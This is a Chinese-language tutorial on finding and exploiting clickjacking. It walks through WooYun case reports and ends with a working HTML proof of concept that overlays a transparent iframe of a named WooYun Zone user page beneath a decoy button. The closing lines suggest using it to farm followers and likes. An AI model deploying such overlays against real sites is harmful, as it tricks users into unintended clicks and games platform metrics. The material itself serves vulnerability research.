0x00簡介
1 說起clickjacking,很多人其實都不知道是干嘛的。比起XSS來說,clickjacking顯得比較神秘,烏云漏洞庫里面的相關的漏洞也不到10條而已。
2 瞌睡龍之前發過一篇clickjacking的技術文檔,主要是介紹clickjacking出現的原因,以及防御的方法。我這里主要是介紹,怎么尋找clickjacking以及怎么去利用。 Clickjacking簡單介紹
提醒一下click jacking和json hijacking完全不是一個東西額,這里大家不要混淆了。
0x01 案例
1 ClickJacking
2 Xss 結合 ClickJacking
可以看到配合clickjacking,某些看起來比較雞助的XSS或者不起眼的設置,也會產生比較嚴重的危害額。
0x02 實例講解
說了這么多,不知道有么有理解。看下面的實例吧。
用另一個低級的漏洞向豌豆莢用戶手機后臺靜默推送并安裝任意應用
他這里是將自己設計了一個頁面,然后上面偽造了一個領獎按鈕,然后將iframe嵌套的原網頁的推送與其領獎的按鈕進行了重疊。
不過不知道是洞主筆誤,還是洞主對于clickjacking的描述還是有一些錯誤。
這里洞主的描述顯然是有問題的。
正確的原理應該是這樣,這個領獎的頁面是在下面,而原iframe的那個頁面在最上面。然后第一個圖由于將iframe完全透明了,所以用戶就只能看到下面的那個領獎頁面。然后用戶點擊領獎,其實是點擊了上層頁面中的推送。
所以藍色圈圈那個位置,應該是“上面”而不是“下面”。
0x03 Zone ClickJacking挖掘
之前看到瞌睡龍的這個文章的下面,劍心說要趕緊給zone的感謝加上clickjacking的防御。
然后我看了下,zone的感謝加了個confrim,不過其實這種只是可以減輕clickjacking的威力,并不能得到根治啊,完全可以構造2個點騙用戶點擊的。
然后zone的關注、喜歡、不喜歡這些功能也沒有防御,目測zone應該是完全沒有防御clickjacking。不過試了試,烏云主站還是對clickjacking進行了防御的,會檢測url有么有被iframe嵌套。
下面給個測試poc,有興趣的可以自己研究研究更好的利用環境。
#!html
<html>
<head>
<meta charset="utf-8" />
<title>clickjacking demo</title>
</head>
<div style="z-index:999;opacity:0.3;width:500px; height:500px;overflow:hidden;position:absolute;top:20px;left:20px;">
<iframe id="inner" style="position:absolute;top:140px;width:1000px;height:500px;left:-484px;" src="http://zone.wooyun.org/user/px1624"></iframe>
</div>
<button id="anwoa" style="cursor:pointer;z-index:10px;position:absolute;top:225px;left:200px;text-align:center;width:100px;height:57px;">按我啊</button>
</html>
利用這個clickjacking的poc代碼,就可以給自己刷點烏云zone的粉絲了。
同時,還可以給自己zone里面的帖子刷喜歡數量。據說這個喜歡數量可是和zone里面的領主算法息息相關的額!